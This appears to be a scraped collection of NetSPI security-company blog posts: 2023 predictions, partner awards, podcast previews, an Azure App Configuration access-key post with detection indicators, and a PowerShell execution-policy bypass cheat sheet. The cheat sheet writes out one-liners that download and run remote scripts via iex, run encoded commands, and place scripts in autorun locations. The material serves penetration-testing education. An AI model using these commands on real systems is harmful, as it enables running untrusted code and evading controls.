Back

Enterprise Security Tech: 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain

On December 29, NetSPI’s Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DTL Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DTL) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises” that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!

Back

NetSPI Partner of the Year Awards 2022

Earlier this year we launched a new partner program, dedicated to equipping partners with pentesting tools, services, and talent, bolstering security worldwide. Our partners have embraced this program, helping us grow our partner community by more than 50%, double our partner-generated opportunities, and achieve 150% of last year’s revenue with partners. Read more about the partner program.  

Today, we are pleased to announce the winners of our inaugural Partner of the Year awards. These awards celebrate the outstanding achievements and contributions of our partners over the past year. Honorees include: 

US Partner of the Year: VLCM

US Partner of the Year: VLCM 

VLCM, an enterprise technology and data solutions provider, has earned the title of US Partner of the Year for their exceptional performance in driving sales and supporting our customers in the US market. Their dedication to our partnership and commitment to excellence has played a vital role in our success as we strive to keep our mutual customers secure, connected, smart, and agile. 

Global Partner of the Year: SecureLink

Global Partner of the Year: SecureLink 

SecureLink, a risk advisory firm headquartered in Dubai, has been named Global Partner of the Year for their outstanding contributions to our global expansion. Their expertise and well-established trust have been invaluable as the NetSPI customer base continues to grow in Europe, the Middle East and Africa. 

New Partner of the Year: CompuNet

New Partner of the Year: CompuNet 

CompuNet, an engineer-led IT solution provider that offers consulting, design and implementation services built on-premise or in the cloud, has been awarded New Partner of the Year for their impressive performance and strong partnership in their first year working with us. Their innovative solutions and proactive approach have helped us to drive growth and meet the needs of our customers. 

Tech Partner of the Year: Contrast Security

Tech Partner of the Year: Contrast Security

Contrast Security, a leading Application Security software company, has been honored as Tech Partner of the Year for their outstanding technical support and innovative solutions, including their compatibility with NetSPI’s Penetration Testing as a Service (PTaaS) platform, Resolve™. Their expertise and dedication to our partnership has enabled us to deliver the best possible products and services to our customers.  

Check out our recent podcast with Larry Maccherone, DevSecOps Transformation Architect at Contrast Security where we explore an untraditional approach to DevSecOps and the future of AppSec Testing.

Hear from Contrast Security. 

Closing Thoughts as We Look Toward 2023 

To our partner community: we are grateful to every single one of you for your hard work and dedication, and we look forward to continuing to drive success with you in the coming year.  

Our partner relationships will be more important than ever, and we’re ready to support our mutual customers as they face new market challenges. Together, we will deliver demonstrable success to our clients’ cybersecurity programs.  

A special thank you to VLCM, SecureLink, CompuNet, and Contrast Security for being such valuable partners and congratulations on your well-deserved recognition! 

Back

9 Trends That Will Dominate Cybersecurity in 2023 

As 2022 comes to a close, it’s clear that this has been a restless year for both threat actors and cybersecurity professionals.

The year started off with a bang as the industry worked around the clock to detect and patch the Log4j vulnerabilities following a mid-holiday disclosure. The cyber sector remained in a perpetual busy season as new technologies like cryptocurrency wallets were hacked, non-profit organizations and health insurance providers suffered data breaches, and entire government systems experienced ransomware attacks – not to mention the prevalence of Russian cyberwarfare which signaled the need for heightened security across the globe.

But for every hack, data breach, and ransomware attack that occurred, there were thousands prevented by global cybersecurity practitioners. There’s a lot of innovation and collaboration to celebrate as we turn the page to 2023.

As we enter the new year, we asked our global team to chime in on the trends they anticipate. From machine learning and software supply chain attacks to the cybersecurity shortage and cyber insurance, our team sees big things ahead.

Table of Contents

  1. There will be an emphasis on machine learning security, threats, and vulnerabilities.
  2. Distributed Ledger Technology (DLT) will help mitigate software supply chain attacks.
  3. The way organizations approach pentesting will become more continuous.
  4. Cyber insurance will become a leading driver for investment in security.
  5. By the end of next year every major financial institution will have announced adoption of blockchain technology.
  6. We will see industry aligned compliance regulations with real penalties.
  7. Training programs will have even more emphasis placed on them to narrow the employment gap.
  8. We expect to see an increase in cloud-agnostic application designs – and corresponding configuration and application vulnerabilities.
  9. The breach and attack simulation market is in the midst of its evolution.

There will be an emphasis on machine learning security, threats, and vulnerabilities. 

“Machine learning (ML) is already deployed in numerous technologies, especially those concerned with security — for example email filters, security information and event management (SIEM) dashboards, and endpoint detection and response (EDR) products. If you thought you could delay ML security conversations, think again. There is a growing group of security researchers focused on Adversarial ML, which includes both attacks on models themselves (inversion, extraction, cloning, etc.) and the use of ML in network attacks and social engineering.  

In the upcoming year, we’ll see a growing list of vulnerabilities being published for ML-integrated systems. Additionally, we’ll see a large amount of research focused on evading classification models to improve attacker success rates as well as some of the first notable “model duplication” incidents — where one entity is accused of cloning a model or attackers release “cloned models” of sensitive classifiers and advanced prediction engines. Privacy is often overlooked when thinking about model training, but data cannot be completely anonymized without destroying its value to ML. In other words, models already contain swaths of private data that might be extracted as part of an attack. While many companies claim to have ‘private enterprise models’, I suspect we’ll begin seeing data breaches from model extraction research.” — Nick Landers, VP of Research, NetSPI

Distributed Ledger Technology (DLT) will help mitigate software supply chain attacks.  

“Over the last few years, there have been several ‘supply chain compromises’ that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. As a result, we expect to see software supply chain attacks continue into 2023 and we need a solution.  

This is where distributed ledger technology (DLT) comes in. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). DLT could be a real asset in stopping supply chain attacks and though the adoption of DTL is still in its infancy, we’ll see some interesting use cases gain momentum in 2023.” — Scott Sutherland, VP of Research, NetSPI 

The way organizations approach pentesting will become more continuous. 

“The perimeter is essentially dead, so the way organizations approach pentesting has to evolve. The attack surface has become more fluid so you have to be able to scan for new assets and entry points continuously. In 2023, organizations will combine traditional pentesting, which in many cases will still be required for regulatory needs, with the proactive approach of a continual assessment of their attack surface. The result will be better awareness of the attack surface and more comprehensive traditional pentesting as there is more information about the true attack surface.” — Chad Peterson, Managing Director, NetSPI

Cyber insurance will become a leading driver for investment in security. 

“Cyber insurance will become a leading driver for investment in security and IT controls. Carriers and brokers will continue to increase underwriting requirements with the goal of not paying out on claims. The challenge for CISOs, CROs, CIOs, CFOs and Board of Directors is that the carriers will use requirements focused on avoiding claims meaning another “compliance” requirement on top of the existing ones. While there may be evolution to acceptance of SOC 2, NIST, ISO and other certifications, the expense will be there for years.” — Norman Kromberg, Managing Director, NetSPI 

By the end of next year every major financial institution will have announced adoption of blockchain technology. 

“There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.  

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.” — Nick Landers, VP of Research, NetSPI

We will see industry aligned compliance regulations with real penalties. 

“Regulations will continue to evolve and become more prescriptive. Regulations need to be much more mature, stringent, and punitive. Organizations must be held accountable for their inaction in the area of cybersecurity. For far too long organizations have not taken cybersecurity seriously enough. No longer is it okay for an organization to act as though it wasn’t their fault or that they weren’t culpable for a breach that occurred. At the very least regulations must hold organizations accountable for the implementation of “Minimum Necessary” cybersecurity controls with heavy penalties for non-compliance. Organizations will be held accountable for basic cybersecurity hygiene. If an organization is unable to meet the most basic standards, a regulator will require a third-party to take over Cybersecurity Program execution (and the organization will be mandated to cover the associated costs). Like the FDA, we will start seeing industry aligned compliance regulations with real penalties that will force compliance and organizational change. The key will be enforcement and penalties.” — Ron Kuriscak, Managing Director, NetSPI

Training programs will have even more emphasis placed on them to narrow the employment gap. 

“2023 will continue to be a jobseeker’s market as many organizations continue to hire cybersecurity talent. With the current cybersecurity shortage demand continues to outweigh supply. Cybercrime magazine predicts that there will still be 3.5 million cyber openings come 2025 — a staggering number to think about, but it’s not changing anytime soon. Training programs, like NetSPI University, will have even more emphasis placed on them to narrow that employment gap. NetSPI U has contributed to the scaling of our consulting team immensely (100+ hires through NetSPI U since 2018). If other organizations can figure out how to hire for team/culture fit and train cybersecurity specific skills through similar programs, the talent gap will continue to lessen. Additionally, in-depth but quick interview processes have become instrumental in hiring top talent before the competition — gone are the days of a drawn-out interview process as candidates are on and off the market extremely fast.” — Heather Crosley, VP People Operations, NetSPI 

We expect to see an increase in cloud-agnostic application designs – and corresponding configuration and application vulnerabilities. 

“Almost every company we work with is building in the cloud or in the process of migrating to it. While companies may dabble in many cloud platforms, they deploy the vast majority of their infrastructure in one primary platform. As part of that effort, many companies have built their applications using cloud-native, platform-specific technologies. For many companies, that initial transition to the cloud provides them with new performance benefits and the ability to truly scale applications and/or services for the first time. However, the downside to this is that after they’ve spent all of those R&D dollars on their initial deployments, they may want to move their applications and/or services to another cloud platform (for a variety of reasons, including cost) but they can’t pivot without a herculean effort (and additional cost). To avoid this problem in the future many companies are investing dev dollars into cloud-agnostic application designs, which tend to rely on both Kubernetes and containers like Docker. Changing our collective mindset about the “right way” to build and deploy applications in that direction introduces a whole new set of configuration and application vulnerabilities that many companies are not prepared to address. Given the trends from previous years, we expect to see some growth in products and services in that space over the next year.” — Karl Fosaaen, VP of Research, NetSPI  

The breach and attack simulation market is in the midst of its evolution. 

The Breach and Attack Simulation (BAS) market is in the middle of its evolution, and we can expect to see some useful incremental improvements as we turn the page on the year. At a high level, customers really value a human component but many BAS solutions in the market don’t offer that today. This will lead to service companies growing in the product space and products moving toward the services space. As a result, most security companies will need to provide a hybrid of technology-enabled services just to stay competitive in the next few years. 

However, to meet customer demand in 2023, more BAS platforms will offer robust modules to simulate flexible command and control, email stack, and native cloud platform attack procedures, as well as the ability to create or customize modules in a meaningful way. Additionally, we’ll see an increase in streamlined product deployments (most likely in the form of SaaS-based offerings) and integrations, as well as improvements in validation inconsistencies and an increase in BAS solutions that offer meaningful data insights.  

To reduce the costs needed for configurations, we’ll see more BAS companies working to streamline their product deployments to help reduce the overhead on their customers. We’ll also see innovations created to help streamline the integration process and limit the need for customization. It is also a challenge to verify that every attack module run by a BAS platform was delivered, executed, and completed successfully. However, it’s even harder to accurately determine if the action was blocked (and by what), determine if an alert was generated, and verify the alert triggered the creation of a proper response ticket. Which is why this year, I believe we’ll see strides made to improve validation inconsistencies. Finally, we’ll see an increase in BAS solutions in the market that offer meaningful data insights to allow companies to track the detection coverage over time.” — Scott Sutherland, VP of Research, NetSPI 

The cybersecurity industry will certainly be thrown curveballs in 2023 but keeping an eye on these nine trends may just help you stay one step ahead of adversaries and inevitable change. For additional research and insights from Team NetSPI, visit https://www.netspi.com/pentesting-team/.

Back

15 Ways to Bypass the PowerShell Execution Policy

By default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn’t have to be. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I’m sure there are many techniques that I’ve missed (or simply don’t know about), but hopefully this cheat sheet will offer a good start for those who need it.

What is the PowerShell Execution Policy?

The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the system. By default it is set to “Restricted“, which basically means none. However, it’s important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That’s why there are so many options for working around it. Including a few that Microsoft has provided. For more information on the execution policy settings and other default security controls in PowerShell I suggest reading Carlos Perez’s blog. He provides a nice overview.

Why Would I Want to Bypass the Execution Policy?

Automation seems to be one of the more common responses I hear from people, but below are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:

  • Native to Windows
  • Able to call the Windows API
  • Able to run commands without writing to the disk
  • Able to avoid detection by Anti-virus
  • Already flagged as “trusted” by most application white list solutions
  • A medium used to write many open source pentest toolkits

How to View the Execution Policy

Before being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the “Restricted” execution policy. You can take a look at the current configuration with the “Get-ExectionPolicy” PowerShell command. If you’re looking at the setting for the first time it’s likely set to “Restricted” as shown below.

PS C:> Get-ExecutionPolicy
Administrator: Windows Powershell

It’s also worth noting that the execution policy can be set at different levels on the system. To view a list of them use the command below. For more information you can check out Microsoft’s “Set-ExecutionPolicy” page here.

Get-ExecutionPolicy -List | Format-Table -AutoSize
Powershell Bypass - ExecutionPolicy

Lab Setup Notes

In the examples below I will use a script named runme.ps1 that contains the following PowerShell command to write a message to the console:

Write-Host "My voice is my passport, verify me."

When I attempt to execute it on a system configured with the default execution policy I get the following error: Powershell Bypass - Set-ExecutionPolicy Restricted

If your current policy is too open and you want to make it more restrictive to test the techniques below, then run the command “Set-ExecutionPolicy Restricted” from an administrator PowerShell console. Ok – enough of my babbling – below are 15 ways to bypass the PowerShell execution policy restrictions.

Bypassing the PowerShell Execution Policy

1. Paste the Script into an Interactive PowerShell Console

Copy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that you will be limited by your current user’s privileges. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.

Interactive PowerShell Console

2. Echo the Script and Pipe it to PowerShell Standard In

Simply ECHO your script into PowerShell standard input. This technique does not result in a configuration change or require writing to disk.

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
Powershell Bypass - Script Echo

3. Read Script from a File and Pipe to PowerShell Standard In

Use the Windows “type” command or PowerShell “Get-Content” command to read your script from the disk and pipe it into PowerShell standard input. This technique does not result in a configuration change, but does require writing your script to disk. However, you could read it from a network share if you’re trying to avoid writing to the disk.

Example 1: Get-Content PowerShell command

Get-Content .runme.ps1 | PowerShell.exe -noprofile -

Powershell Bypass - Get-Content Command

Example 2: Type command

TYPE .runme.ps1 | PowerShell.exe -noprofile -
Powershell Bypass - Type command

4. Download Script from URL and Execute with Invoke Expression

This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"
Powershell Bypass - Execute with Invoke Expression

5. Use the Command Switch

This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console. It’s nice for simple script execution, but more complex scripts usually end up with parsing errors. This technique does not result in a configuration change or require writing to disk.

Example 1: Full command

Powershell -command "Write-Host 'My voice is my passport, verify me.'"

Powershell Bypass - Command Switch

Example 2: Short command

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

It may also be worth noting that you can place these types of PowerShell commands into batch files and place them into autorun locations (like the all users startup folder) to help during privilege escalation.

6. Use the EncodeCommand Switch

This is very similar to the “Command” switch, but all scripts are provided as a Unicode/base64 encoded string. Encoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the “Command” switch. This technique does not result in a configuration change or require writing to disk. The sample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long.

Example 1: Full command

$command = "Write-Host 'My voice is my passport, verify me.'" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -EncodedCommand $encodedCommand
Powershell Bypass - EncodeCommand Switch

Example 2: Short command using encoded string

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

7. Use the Invoke-Command Command

This is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive PowerShell console or one liner using the “Command” switch, but the cool thing is that it can be used to execute commands against remote systems where PowerShell remoting has been enabled. This technique does not result in a configuration change or require writing to disk.

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
Powershell Bypass - Invoke-Command Command

Based on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote computer and apply it to the local computer.

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. Use the Invoke-Expression Command

This is another one that’s typically executed through an interactive PowerShell console or one liner using the “Command” switch. This technique does not result in a configuration change or require writing to disk. Below I’ve listed are a few common ways to use Invoke-Expression to bypass the execution policy.

Example 1: Full command using Get-Content

Get-Content .runme.ps1 | Invoke-Expression
Powershell Bypass - Invoke-Expression Command

Example 2: Short command using Get-Content

GC .runme.ps1 | iex

9. Use the “Bypass” Execution Policy Flag

This is a nice flag added by Microsoft that will bypass the execution policy when you’re executing scripts from a file. When this flag is used Microsoft states that “Nothing is blocked and there are no warnings or prompts”. This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
ExecutionPolicy Bypass

10. Use the “Unrestricted” Execution Policy Flag

This similar to the “Bypass” flag. However, when this flag is used Microsoft states that it “Loads all configuration files and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted for permission before it runs.” This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
Powershell Bypass - Swap out the AuthorizationManager

11. Use the “Remote-Signed” Execution Policy Flag

Create your script then follow the tutorial written by Carlos Perez to sign it. Finally,run it using the command below:

PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

This is one of the more creative approaches. The function below can be executed via an interactive PowerShell console or by using the “command” switch. Once the function is called it will swap out the “AuthorizationManager” with null. As a result, the execution policy is essentially set to unrestricted for the remainder of the session. This technique does not result in a persistant configuration change or require writing to disk. However, it the change will be applied for the duration of the session.

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} 

Disable-ExecutionPolicy  .runme.ps1
Powershell Bypass - Process Scope

13. Set the ExcutionPolicy for the Process Scope

As we saw in the introduction, the execution policy can be applied at many levels. This includes the process which you have control over. Using this technique the execution policy can be set to unrestricted for the duration of your Session. Also, it does not result in a configuration change, or require writing to the disk.

Set-ExecutionPolicy Bypass -Scope Process
Powershell Bypass - Set the ExcutionPolicy

14. Set the ExcutionPolicy for the CurrentUser Scope via Command

This option is similar to the process scope, but applies the setting to the current user’s environment persistently by modifying a registry key. Also, it does not result in a configuration change, or require writing to the disk.

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
CurrentUser Scope via the

15. Set the ExcutionPolicy for the CurrentUser Scope via the Registry

In this example I’ve shown how to change the execution policy for the current user’s environment persistently by modifying a registry key directly.

HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Powershell Bypass – Folder Structure

Wrap Up Summary

I think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins, or penetration testing. Microsoft never intended it to be a security control. Which is why there are so many options for bypassing it. Microsoft was nice enough to provide some native options and the security community has also come up with some really fun tricks. Thanks to all of those people who have contributed through blogs and presentations. To the rest, good luck in all your PowerShell adventures and don’t forget to hack responsibly. 😉

Looking for a strategic partner to critically test your Windows systems? Explore NetSPI’s network penetration testing services.

References

Back

Hacker Valley: Intentional Investments in People-Focused Leadership with Cody Wass

On December 15, NetSPI VP of Services Cody Wass was featured in the Hacker Valley podcast episode called Intentional Investments in People-Focused Leadership with Cody Wass. Read the preview below or view it online.

+++

Cody Wass, VP of Services at NetSPI, brings his near-decade of experience to the pod to talk about longevity, development, and leadership. It’s no secret that cybersecurity is in need of people. Cody’s journey from intern to VP at NetSPI has shown him the importance of training employees, creating opportunities for new graduates, and engaging teams effectively, both virtually and in-person. In this episode, Cody provides the roadmap towards intentional employee investment in the ever-changing cyber industry.

Back

Switched On: Digital Transformation as Improving Processes with Alex Jones

On December 8, NetSPI Chief Revenue Officer, Alex Jones, was featured in the Switched On podcast called Digital Transformation as Improving Processes with Alex Jones. Read the preview below or view it online.

+++

James and Paul talk to Alex Jones (not THAT one) from NetSPI about the heretofore unseen connections between penetration testing and security. Alex brings a fresh perspective from his sales and marketing leadership positions, and it really stretched our imaginations. 

Back

How to Gather Azure App Configurations

Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.

TL;DR

The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.

What are App Configurations?

The App Configuration service is a very simple service. Provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a really simple way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.

Gathering Access Keys

Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks. 

Regardless of the type of key that an attacker acquires, this can lead to access the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.

To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/” action.

From the portal, you can copy out the connection string directly from the “Access keys” menu.

An example of the portal in an ap configuration service.

This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.

Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.

An example of an app configuration access key found in public data sources.

Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.

Using the Keys

Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.

This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.

The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.

A list of configuration values from the Get-AzAppConfiguration function.

In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.

IoCs

Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:

  • Azure Activity Log – List Access Keys
    • Category – “Administrative”
    • Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
    • Status – “Started”
    • Caller – < UPN of account listing keys>
An example of an app configuration audit log, capturing details of the account used to access data.
  • App Configuration Service Logs

Conclusions

We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string and defenders areas to look at to help secure their configuration environments.

For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.

Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.

Back

How to Paint a Comprehensive Threat Detection Landscape

In practice, threat detection is not a binary – it is a process. An organization’s coverage depends on where they are within that process. By measuring that process across the Tactics, Techniques and Procedures (TTPs) of the MITRE ATT&CK framework you can paint a realistic picture of your detection landscape. 

Detection is generally carried out in the following consecutive steps: Logging, Detection, Alerting, and Response. Each step in the pipeline is a piece of metadata that should be tracked alongside procedures to paint our landscape. This data tells us where we do or do not have visibility and where our technology, people, and processes (TPPs) fail or are incomplete.

  LoggingGenerally, logs must be collected and aggregated to identify malicious activity. This is not only important from a forensic perspective, but also for creating, validating, and updating baselines.
  DetectionDetection can then be derived from the log aggregations. Detections are typically separated by fidelity levels, which then feed alerts.
  AlertingAlerts are any event, detection, or correlation that requires triage and may warrant a more in-depth response action. Events at this level can still be somewhat voluminous but are typically deemed impactful enough to require some human triage and response.
  Response Response is where technology is handed off to people and processes. Triage, investigation, escalation, and eviction of the adversary occur within a response. Response is usually executed by a security operations or incident response team. The response actions vary depending on the internal playbooks of the company.
  PreventionThis sits somewhat outside the threat detection pipeline. Activities can, and often are, prevented without further alerting or response. Prevention may occur without events being logged. Ideally, preventions should be logged to feed into the detection and alert steps of the pipeline.

By assembling these individual data points for several procedures, we can confidently approximate a coverage level for an individual technique. We can also identify commonalities and create categories of detection to cover as much or as many of the base conditions as our visibility allows.  

Once many techniques are aggregated in this way, you can begin to confidently understand your threat detection landscape with all the nuance observed at the tactical level. A great man (Robert M. Lee) once said “We derive much value by putting data into buckets,” and it is no different here. 

By looking at what data sources provide logging, detection, and prevention we can get a true sense of detective control efficacy. By looking at coverage over the different phases of the kill chain, we can start to prioritize choke points, detective efforts, emulation, deception, and research. By cataloging areas where prevention or detection are not carried forward to the alerting or response phases, we can better evaluate gaps, more accurately evaluate security products, and more efficiently spend budget or hours fixing those gaps with breach and attack simulation or similar tests. 

The data derived here is also useful in countless other ways. Purple and red teams can plan more effective tests or focus on known or suspected gaps. Threat intelligence teams can focus collection efforts on problematic TTPs. SOC analysts gain better situational awareness and have documentation to validate assumptions against. CISOs have confidence in their detection coverage and investments and can plan for product/resource changes more effectively.  

The pipeline that turns an activity on a system into an event that is responded to by the security team can be long and complicated. Knowledge of your coverage is your map of the battlefield and influences your decisions and directives and thus the activity that occurs at the strategic, operational, and tactical level. 

If you are relying on vendor coverage without further extension or customization, then you are susceptible to anyone who can defeat that vendor’s security product. By having a map, performing analysis, and designing behavior-based threat detections you are creating a delta that will ensure you’re not the slowest man running from the bear.  

Looking for a more in-depth analysis of MITRE ATT&CK Evaluations and how to improve your detective controls? Read my detailed analysis on the NetSPI technical blog

Ready to get started? Collaborate with NetSPI’s Breach and Attack Simulation experts.
Back

Authority Magazine: Wisdom From The Women Leading The Cybersecurity Industry, With Melissa Miller of NetSPI

On December 1, NetSPI Managing Security Consultant, Melissa Miller, was featured in the Authority Magazine article called Wisdom From The Women Leading The Cybersecurity Industry, With Melissa Miller of NetSPI. Read the preview below or view it online.

+++

The cybersecurity industry has become so essential and exciting. What is coming around the corner? What are the concerns we should keep an eye out for? How does one succeed in the cybersecurity industry? As a part of this interview series called “Wisdom From The Women Leading The Cybersecurity Industry”, we had the pleasure of interviewing Melissa Miller.

As a Managing Security Consultant at NetSPI, Melissa oversees the performance of web application penetration tests by NetSPI’s security practitioners, and serves as an instructor for NetSPI University — a training program for entry-level cybersecurity professionals new to penetration testing. Melissa is also a leader on NetSPI’s DE&I committee, which includes representing the company in various public-facing speaking events, panels, and partnerships. She has her BSc in Computer Science from the University of Minnesota as well as OSCP and CEH certifications.

Thank you so much for doing this with us! Before we dig in, our readers would like to get to know you a bit. Can you tell us a bit about your backstory and how you grew up?

grew up in Excelsior, MN. My dad was an IT professional and a tech enthusiast so I would sometimes spend summers with him, even though grudgingly, running Windows updates on some of his clients’ machines, doing python programs, and even building out a python game together. That planted the seed of technology in my brain from a young age, but it wasn’t something that I ever wanted to do as a career because there was this stigma of being a “nerd” and being “un-cool” for IT professionals, which I found out later to be a shallow statement.

